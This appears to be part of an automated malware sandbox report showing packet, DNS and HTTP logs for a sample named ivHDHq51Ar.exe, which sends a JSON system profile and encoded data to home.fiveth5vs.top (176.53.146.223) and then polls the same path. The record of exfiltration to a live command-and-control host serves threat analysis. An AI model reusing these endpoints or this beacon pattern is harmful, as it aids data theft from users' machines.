                            Dec 31, 2024 09:45:26.032283068 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032310009 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032315016 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032344103 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032347918 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032388926 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032392979 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032427073 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032430887 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032448053 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036762953 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036856890 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036860943 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036880016 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036921024 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036979914 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036989927 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037036896 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037036896 CET4970680192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:26.037040949 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037091017 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037096977 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037143946 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037147999 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037192106 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037201881 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037224054 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037228107 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037312984 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037317038 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037329912 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037333965 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037419081 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037422895 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037446976 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037451029 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037506104 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037509918 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037544012 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037614107 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037617922 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037627935 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037632942 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037636995 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037695885 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037699938 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037729979 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037734985 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037746906 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037750959 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037791014 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037795067 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037837982 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037842035 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037875891 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037879944 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037890911 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037925959 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037930012 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.038121939 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.038125992 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.038150072 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.038216114 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.038220882 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.041908026 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.041923046 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042004108 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042012930 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042054892 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042058945 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042093992 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042098999 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042143106 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042146921 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042185068 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042216063 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042278051 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042282104 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042332888 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042336941 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042370081 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042380095 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042419910 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042423964 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042434931 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042438984 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042467117 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042541027 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042545080 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042555094 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042567968 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042576075 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042613029 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042622089 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042670012 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042674065 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042726994 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042731047 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042735100 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:29.171086073 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:29.171576977 CET4970680192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:29.176601887 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:29.176650047 CET4970680192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:29.853503942 CET4970780192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:29.858655930 CET8049707176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:29.858756065 CET4970780192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:29.859013081 CET4970780192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:29.863730907 CET8049707176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:30.688366890 CET8049707176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:30.688849926 CET4970780192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:30.693866014 CET8049707176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:30.693933964 CET4970780192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:31.502676964 CET4970880192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:31.507524967 CET8049708176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:31.507610083 CET4970880192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:31.507883072 CET4970880192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:31.512649059 CET8049708176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:32.606327057 CET8049708176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:32.606849909 CET4970880192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:32.611902952 CET8049708176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:32.611958027 CET4970880192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:50.440867901 CET6163353192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:50.447299004 CET53616331.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:50.447406054 CET6163353192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:50.452264071 CET53616331.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:50.978281021 CET6163353192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:50.983289003 CET53616331.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:50.983357906 CET6163353192.168.2.91.1.1.1
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Dec 31, 2024 09:45:22.202955961 CET | 55596 | 53 | 192.168.2.9 | 1.1.1.1
                            Dec 31, 2024 09:45:22.203018904 CET | 55596 | 53 | 192.168.2.9 | 1.1.1.1
                            Dec 31, 2024 09:45:22.210005045 CET | 53 | 55596 | 1.1.1.1 | 192.168.2.9
                            Dec 31, 2024 09:45:22.210335016 CET | 53 | 55596 | 1.1.1.1 | 192.168.2.9
                            Dec 31, 2024 09:45:24.596910000 CET | 55599 | 53 | 192.168.2.9 | 1.1.1.1
                            Dec 31, 2024 09:45:24.597090960 CET | 55599 | 53 | 192.168.2.9 | 1.1.1.1
                            Dec 31, 2024 09:45:25.501094103 CET | 53 | 55599 | 1.1.1.1 | 192.168.2.9
                            Dec 31, 2024 09:45:25.501184940 CET | 53 | 55599 | 1.1.1.1 | 192.168.2.9
                            Dec 31, 2024 09:45:29.231668949 CET | 55601 | 53 | 192.168.2.9 | 1.1.1.1
                            Dec 31, 2024 09:45:29.231780052 CET | 55601 | 53 | 192.168.2.9 | 1.1.1.1
                            Dec 31, 2024 09:45:29.851187944 CET | 53 | 55601 | 1.1.1.1 | 192.168.2.9
                            Dec 31, 2024 09:45:29.851293087 CET | 53 | 55601 | 1.1.1.1 | 192.168.2.9
                            Dec 31, 2024 09:45:30.742609978 CET | 55603 | 53 | 192.168.2.9 | 1.1.1.1
                            Dec 31, 2024 09:45:30.742664099 CET | 55603 | 53 | 192.168.2.9 | 1.1.1.1
                            Dec 31, 2024 09:45:31.279474020 CET | 53 | 55603 | 1.1.1.1 | 192.168.2.9
                            Dec 31, 2024 09:45:31.501432896 CET | 53 | 55603 | 1.1.1.1 | 192.168.2.9
                            Dec 31, 2024 09:45:50.440259933 CET | 53 | 65424 | 1.1.1.1 | 192.168.2.9
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Dec 31, 2024 09:45:22.202955961 CET | 192.168.2.9 | 1.1.1.1 | 0x3af6 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
                            Dec 31, 2024 09:45:22.203018904 CET | 192.168.2.9 | 1.1.1.1 | 0xc0d2 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
                            Dec 31, 2024 09:45:24.596910000 CET | 192.168.2.9 | 1.1.1.1 | 0x44d4 | Standard query (0) | home.fiveth5vs.top | A (IP address) | IN (0x0001) | false
                            Dec 31, 2024 09:45:24.597090960 CET | 192.168.2.9 | 1.1.1.1 | 0xfa75 | Standard query (0) | home.fiveth5vs.top | 28 | IN (0x0001) | false
                            Dec 31, 2024 09:45:29.231668949 CET | 192.168.2.9 | 1.1.1.1 | 0xf0f | Standard query (0) | home.fiveth5vs.top | A (IP address) | IN (0x0001) | false
                            Dec 31, 2024 09:45:29.231780052 CET | 192.168.2.9 | 1.1.1.1 | 0x8fba | Standard query (0) | home.fiveth5vs.top | 28 | IN (0x0001) | false
                            Dec 31, 2024 09:45:30.742609978 CET | 192.168.2.9 | 1.1.1.1 | 0xdd6 | Standard query (0) | home.fiveth5vs.top | A (IP address) | IN (0x0001) | false
                            Dec 31, 2024 09:45:30.742664099 CET | 192.168.2.9 | 1.1.1.1 | 0x29b4 | Standard query (0) | home.fiveth5vs.top | 28 | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Dec 31, 2024 09:45:22.210335016 CET | 1.1.1.1 | 192.168.2.9 | 0x3af6 | No error (0) | httpbin.org |  | 34.200.57.114 | A (IP address) | IN (0x0001) | false
                            Dec 31, 2024 09:45:22.210335016 CET | 1.1.1.1 | 192.168.2.9 | 0x3af6 | No error (0) | httpbin.org |  | 34.197.122.172 | A (IP address) | IN (0x0001) | false
                            Dec 31, 2024 09:45:25.501094103 CET | 1.1.1.1 | 192.168.2.9 | 0x44d4 | No error (0) | home.fiveth5vs.top |  | 176.53.146.223 | A (IP address) | IN (0x0001) | false
                            Dec 31, 2024 09:45:29.851187944 CET | 1.1.1.1 | 192.168.2.9 | 0xf0f | No error (0) | home.fiveth5vs.top |  | 176.53.146.223 | A (IP address) | IN (0x0001) | false
                            Dec 31, 2024 09:45:31.501432896 CET | 1.1.1.1 | 192.168.2.9 | 0xdd6 | No error (0) | home.fiveth5vs.top |  | 176.53.146.223 | A (IP address) | IN (0x0001) | false
                            • httpbin.org
                            • home.fiveth5vs.top
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.9 | 49706 | 176.53.146.223 | 80 | 1136 | C:\Users\user\Desktop\ivHDHq51Ar.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Dec 31, 2024 09:45:25.508774042 CET | 12360 | OUT | POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                            Host: home.fiveth5vs.top
                            Accept: */*
                            Content-Type: application/json
                            Content-Length: 501538
                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 37 38 33 37 37 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                            Data Ascii: { "ip": "8.46.123.189", "current_time": "8485909137206783777", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 792 }, { "name": "svchost.exe" [TRUNCATED]
                            Dec 31, 2024 09:45:25.513742924 CET | 4944 | OUT | Data Raw: 52 45 56 76 32 63 6e 6c 5a 56 56 57 6b 66 34 77 66 48 67 50 49 51 41 43 37 69 4c 34 6e 78 78 68 33 49 33 4d 49 34 30 51 45 6e 59 69 72 68 52 5c 2f 41 5c 2f 6a 4a 39 4e 66 4e 66 44 66 78 50 34 72 38 4e 2b 47 50 43 66 41 38 58 5c 2f 77 43 70 63 73
                            Data Ascii: REVv2cnlZVVWkf4wfHgPIQAC7iL4nxxh3I3MI40QEnYirhR\/A\/jJ9NfNfDfxP4r8N+GPCfA8X\/wCpcskwed55nniJX4NpTzfOuHMo4rhgsrwGB4B40q4vDYXJs\/yiVfHYrEZe5YyviMNSwk4Yb6xU\/wBb\/o\/fs1\/DvxH8BPCzxs8WPpIcW+G+K8ZMDxbxFwdwZ4e+AWU+LdbC8H8J+IfF3hbLOOJ894j8ePBrDZXmWa
                            Dec 31, 2024 09:45:25.513772964 CET | 4944 | OUT | Data Raw: 34 58 44 31 34 50 47 34 72 36 39 4b 70 52 70 59 6c 52 70 54 39 6a 4f 38 6c 79 4e 78 5c 2f 31 55 38 4c 76 45 66 68 5c 2f 4c 5c 2f 42 4c 77 38 71 5a 78 68 4b 32 64 31 61 47 51 59 36 46 62 4c 73 48 52 77 57 4e 78 2b 43 79 6e 68 7a 47 35 6e 6c 32 4c
                            Data Ascii: 4XD14PG4r69KpRpYlRpT9jO8lyNx\/1U8LvEfh\/L\/BLw8qZxhK2d1aGQY6FbLsHRwWNx+CynhzG5nl2LzVYXF4jDzWDwiy+EK1TDSdWCrU7RftIKf6LJ8C5dK01z4c8WaXq1vCS4t\/EEcfhHUipUSSM0t1eX\/hqOCEHHn3XiS0llxuFpGSEHJvpvhHSFDeIPGEF1c7ULaR4Msz4iu4pM7ngvNYuZ9J8MxRsgCre6Lq3iXyp
                            Dec 31, 2024 09:45:25.513833046 CET | 4944 | OUT | Data Raw: 2b 48 48 2b 54 54 4a 57 5c 2f 64 37 33 5c 2f 37 2b 66 35 36 63 34 5c 2f 77 71 62 5c 2f 57 66 78 5c 2f 39 73 5c 2f 38 41 36 33 38 76 35 55 78 68 75 6b 64 39 6b 65 50 38 5c 2f 68 7a 7a 5c 2f 77 44 72 6f 4e 43 74 74 33 52 38 6e 79 2b 30 55 58 6d 5c
                            Data Ascii: +HH+TTJW\/d73\/7+f56c4\/wqb\/Wfx\/9s\/8A638v5Uxhukd9keP8\/hzz\/wDroNCtt3R8ny+0UXm\/8vH4\/wBO\/aoW+RUd0ynXzPK\/H\/8AVVpDt\/d\/9MvN8zn\/AD\/npSN\/rP8AYMX+rjz\/AJ7d6DSn1+X6lbb\/AB9PTzJfxqs38L5jD\/63\/P8AP\/Jqyy7uB878RRSdfO+x+n4flTGj5f8Aj\/z+fX9KD
                            Dec 31, 2024 09:45:25.513851881 CET | 4944 | OUT | Data Raw: 51 32 74 36 46 38 50 64 59 31 57 58 77 70 5a 36 39 71 2b 76 33 55 39 6a 65 32 6d 76 36 31 59 61 68 2b 69 64 66 69 70 5c 2f 77 56 4c 5c 2f 41 47 55 66 69 31 2b 31 6c 38 63 5c 2f 32 57 66 42 66 77 30 38 43 2b 44 39 54 74 5c 2f 2b 46 47 66 74 73 61
                            Data Ascii: Q2t6F8PdY1WXwpZ69q+v3U9je2mv61Yah+idfip\/wVL\/AGUfi1+1l8c\/2WfBfw08C+D9Tt\/+FGftsaDffF34h2njeLw1+z34p8YXP7L9n4I+KXhXX\/BnhzWJNP8AjboMmm6\/rPwn0e+1nwYPEL6J4oRfE1tYadq1vcfkb8Z\/2V\/j3qHgb9r7Qvg9+zv+0NB8Up\/ih\/wVHv8A4\/fEA\/Cbx74Zg\/aT+D3xD8TeMo
                            Dec 31, 2024 09:45:25.513886929 CET | 2472 | OUT | Data Raw: 2f 35 36 5c 2f 6c 2b 48 54 70 54 50 75 73 6e 38 66 38 41 73 53 66 6c 32 70 37 62 48 6a 6d 33 2b 59 6e 6d 66 39 73 4d 66 35 5c 2f 2b 76 6b 55 2b 50 39 35 36 6f 5c 2f 38 41 79 79 6a 6b 69 78 5c 2f 6e 38 66 65 67 43 6e 4a 5c 2f 65 54 36 2b 56 2b 5a
                            Data Ascii: /56\/l+HTpTPusn8f8AsSfl2p7bHjm3+Ynmf9sMf5\/+vkU+P956o\/8Ayyjkix\/n8fegCnJ\/eT6+V+Zx\/Lp+XepPMQSf6nyZp\/3uf9dx1\/0TGf8APHpTt22RNk0bp+f+Of6YqFZDH5zOkn7z\/n3\/AOfcd\/8A9XatPaeX4\/8AAAbJjy9++R383\/VyS\/uOnP8A9cev6ofL8z+\/\/wBsv9Tx\/n8zT1\/3JPfzP3H
                            Dec 31, 2024 09:45:25.513921976 CET | 2472 | OUT | Data Raw: 32 6e 5c 2f 45 48 55 5c 2f 43 33 78 46 75 50 6a 64 71 50 69 6a 77 64 6f 75 76 6d 30 75 5c 2f 43 56 6e 34 32 30 72 34 55 66 41 54 34 6f 4c 34 62 38 51 2b 4c 5c 2f 44 6c 37 62 65 4d 4e 48 38 50 58 6c 7a 5c 2f 62 46 6a 34 62 6d 74 4c 72 78 50 61 65
                            Data Ascii: 2n\/EHU\/C3xFuPjdqPijwdouvm0u\/CVn420r4UfAT4oL4b8Q+L\/Dl7beMNH8PXlz\/bFj4bmtLrxPaeHr3VNGsNStfGfTbP4Lar4k0S\/wDHPwx+IGq+DfHfwr+GPi3S\/hzqnxFl1jwx8Q\/jN4N1fx34D8Ga9onxC+Fnw51jT\/E17oWh6nb6toDWUms+GfEVpc+FPEun6T4jtLzTbf4b\/iLvhssRgcNLizB055nUnSy+
                            Dec 31, 2024 09:45:25.518619061 CET | 4944 | OUT | Data Raw: 7a 62 68 37 4e 38 42 6d 57 62 59 54 42 59 4b 68 53 70 34 79 47 48 70 52 65 44 7a 37 41 38 51 35 64 43 4f 46 7a 43 6c 56 77 4f 5a 55 63 5a 67 38 5a 68 34 54 71 59 62 44 34 6e 44 5c 2f 41 4e 65 5c 2f 52 34 34 75 2b 6d 4e 39 44 6a 4f 2b 4f 63 37 34
                            Data Ascii: zbh7N8BmWbYTBYKhSp4yGHpReDz7A8Q5dCOFzClVwOZUcZg8Zh4TqYbD4nD\/ANe\/R44u+mN9DjO+Oc74A8PcuxWA4w4PrZNx7wtxzwrw5x7wln2QZJjK3E9LF4jKcViK06OacLY\/hrF5lhs3yTFYPOMmeFzDBVsRDB5hj8DjP0d\/4fR\/8FAv+hC\/Y6\/8Jb41\/wDz06P+H0f\/AAUC\/wChC\/Y6\/wDCW+Nf\/wA9Ov
                            Dec 31, 2024 09:45:25.518650055 CET | 4944 | OUT | Data Raw: 38 41 4d 32 63 76 39 6e 5c 2f 76 5c 2f 68 2b 4e 56 64 32 33 2b 50 35 78 78 31 5c 2f 38 6d 76 38 41 50 72 2b 46 61 46 6a 79 7a 38 70 5c 2f 33 36 6b 6b 5c 2f 77 41 5c 2f 35 5c 2f 57 6f 66 6e 38 76 65 66 6b 5c 2f 4c 72 5c 2f 30 36 66 79 70 5c 2f 77
                            Data Ascii: 8AM2cv9n\/v\/h+NVd23+P5xx1\/8mv8APr+FaFjyz8p\/36kk\/wA\/5\/Wofn8vefk\/Lr\/06fyp\/wDrAPk\/df8ALLv\/AJ4P55qFc\/cP+kp\/11\/fw\/hz\/Kuc6+d+X9fMZN935I\/n\/wBVL\/02\/wA9enp+MLKnmOU+eP8A1Xmf8t\/89f0q+38D\/vH8uX91z3\/Xr+VVm2R42fc\/z\/n68e9BqUxv8v7\/AG
                            Dec 31, 2024 09:45:25.518763065 CET | 4944 | OUT | Data Raw: 45 79 32 50 69 54 34 69 5c 2f 44 76 34 45 66 48 6e 55 50 48 76 37 4e 37 65 4d 64 53 31 7a 34 34 65 46 58 31 69 39 31 6e 78 39 71 56 6c 70 75 6c 5c 2f 42 66 34 6b 32 73 38 63 6d 71 66 45 62 56 38 6e 34 54 36 54 38 49 5c 2f 77 42 6e 48 78 56 38 51
                            Data Ascii: Ey2PiT4i\/Dv4EfHnUPHv7N7eMdS1z44eFX1i91nx9qVlpul\/Bf4k2s8cmqfEbV8n4T6T8I\/wBnHxV8Q\/E3xS+LOgfG268b6J4Y\/aki+Jfwy8M\/G\/XdK8a\/twfAv4qS\/Fn4NaZ4otPHnwq+Cvj+B\/HGr3vjPwn4l8Q3nhq18J6bafEYarql\/cR2d2+l\/SU+g6BdFWudC0e4ZQQrT6bZSlQTkhTJAxAJ5IHGalTQt
                            Dec 31, 2024 09:45:25.563225985 CET | 34608 | OUT | Data Raw: 2f 41 4a 63 34 71 46 4b 74 48 33 6f 49 2b 4b 66 6a 52 71 6b 58 78 64 38 49 33 50 77 6c 2b 45 50 77 2b 2b 46 66 67 33 77 5c 2f 65 66 73 55 66 73 53 5c 2f 73 36 5c 2f 48 72 39 6f 5c 2f 52 64 4a 2b 4d 38 50 78 36 38 64 61 56 38 43 66 68 74 38 4a 30
                            Data Ascii: /AJc4qFKtH3oI+KfjRqkXxd8I3Pwl+EPw++Ffg3w\/efsUfsS\/s6\/Hr9o\/RdJ+M8Px68daV8Cfht8J08afBO6T4hfEdfhxo3gnQvib4I0h7y\/+Enwu8Cal49HgLw0mp+P\/ABH4el1B9X634pePPhR4Xt\/DWqfEX4v\/AA5\/aV\/aLtvB37dngSf9qH4RfCD4yaF4m1r4W+Ov+Ce\/xY+Bnwk8JftQeI\/G3wh+GXiv40
                            Dec 31, 2024 09:45:29.171086073 CET | 138 | IN | HTTP/1.1 200 OK
                            server: nginx/1.22.1
                            date: Tue, 31 Dec 2024 08:45:29 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1
                            Data Raw: 30
                            Data Ascii: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.9 | 49707 | 176.53.146.223 | 80 | 1136 | C:\Users\user\Desktop\ivHDHq51Ar.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Dec 31, 2024 09:45:29.859013081 CET | 98 | OUT | GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1
                            Host: home.fiveth5vs.top
                            Accept: */*
                            Dec 31, 2024 09:45:30.688366890 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
                            server: nginx/1.22.1
                            date: Tue, 31 Dec 2024 08:45:30 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 207
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
